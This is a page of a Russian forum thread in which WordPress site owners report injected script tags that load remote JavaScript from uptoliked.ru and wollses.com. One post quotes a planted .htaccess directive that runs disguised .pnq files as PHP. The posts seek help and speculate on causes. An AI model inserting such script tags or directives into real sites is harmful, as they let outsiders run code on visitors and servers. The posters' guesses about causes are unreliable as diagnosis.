Появился скрипт в статьях на Wordpress

1 2345 6
tocell
На сайте с 26.05.2011
Offline
55
#31
Nadejda:
Всего лишь закрыть для доступа 2 папки. Для этого никакого опыта не требуется, задача для щкольника.

подскажите пожалуйста какие именно папки можно спокойно закрыть для всех без ущерба для работы сайта. и как быть, если айпи динамический?

подпись
MrZob
На сайте с 21.01.2013
Offline
93
#32

так же пострадало достаточное кол-во сайтов

В папке с изображениями появляется файл cache.php

И вот тут парочку

/wp-includes/js/plupload/meta.pnq

/wp-includes/js/plupload/.htaccess

.htaccess с содержанием

AddType application/x-httpd-php .pnq

Подскажите че он делает?

P.S. И прикрепил meta.pnq и cache.php в архиве подскажете что ето за звери

zip file.zip
M1
На сайте с 22.10.2015
Offline
0
#33
avantus:
На сайте на движке wordpress в статьях встроился кусок <script src="//uptoliked.ru/widjets.js"></script>.
Кто сталкивался и кто знает откуда он появился и как бороться?
Не знаю из-за него или нет, но после апдейта Яндекса от 10 августа начал стремительно проседать, росший до этого, трафик.
Прошу помощи.

Тоже появился такой скрипт в теле записи и на страницах. Располагается случайно. Есть и в тексте есть и в ссылках.

ALL in SEO

RUS TO LAT -- у всех присутствует

uptoliked.ru - сервис виджета социальных кнопок. Однако ранее у меня внедрялась другая ссылка. Тоже просто почистил вручную. Постов 30 заражено было.

Я проверял сайт плагином Exploit Scanner время от времени.

Однако как решить проблему непонятно. Гребаные спамеры охренели вконец.😡

M1
На сайте с 22.10.2015
Offline
0
#34
avantus:
На сайте на движке wordpress в статьях встроился кусок <script src="//uptoliked.ru/widjets.js"></script>.
Кто сталкивался и кто знает откуда он появился и как бороться?
Не знаю из-за него или нет, но после апдейта Яндекса от 10 августа начал стремительно проседать, росший до этого, трафик.
Прошу помощи.

Да и вдогонку: у кого стоит cformsII - афтар плагина выразился, что больше не может заниматься латанием дыр от внедрения PHP и прекращает поддерживать более чем 10 летний проект.

A
На сайте с 20.08.2010
Offline
775
#35
Проблема как мне кажется даже более серьезная sql-injection, у меня сайт находится в разработке и к нему закрыт доступ по ip, и тем не менее вот этот скрипт появился в ссылках

Возможно темы, но некоторые пишут, что на самописных даже появляется
Возможно плагины, но есть те, кто пишут что стоит стандартный набор
Остается sql-injection, но вот у меня сайт закрыт от внешнего доступа тогда возможно хостинг инфицирован.
Я думаю нужно хостинг проверить, посмотреть у какого какой

Уж если на закрытом сайте появляется. Вы кнопки левые не ставили, а то они себя уже проявили в не самом лучшем свете.

SeVlad
На сайте с 03.11.2008
Offline
1609
#36
michserg111:
Да и вдогонку: у кого стоит cformsII - афтар плагина выразился, что больше не может заниматься латанием дыр от внедрения PHP и прекращает поддерживать более чем 10 летний проект.

И в опережение: давно есть форк этого замечательнейшего плага - https://wordpress.org/plugins/cforms2/

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
MrZob
На сайте с 21.01.2013
Offline
93
#37
michserg111:

ALL in SEO
RUS TO LAT -- у всех присутствует

так же везде есть эти плагины, грешу на RUS TO LAT ибо код и файлы появились на сайтах сделаных неделю-2 назад

A
На сайте с 20.08.2010
Offline
775
#38

Народ пишет про xmlrpc.php, так что может я был прав. Этот скрипт использует мобильный редирект?

auditsaitov001
На сайте с 28.06.2015
Offline
11
#39

AddType application/x-httpd-php .pnq - выполнять файлы с расширением .pnq как пхп...

Аудит безопасности Вашего сайта квалифицированным специалистом по иб. Ручная проверка кода на уязвимости, поиск вирусов, вебшеллов и проч. Полная проверка, а не простое удаление вирусов.
A
На сайте с 27.07.2010
Offline
71
#40

Некоторое время назад почистил записи в блоге от вот такого кода

<script src="//wollses.com/steps"></script>

Поменял все пароли: в админку, на сервер, фтп. Сделал запрет по IP.

Сегодня снова обнаружил этот код.

Кто-нибудь знает, где искать уязвимость?

1 2345 6

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий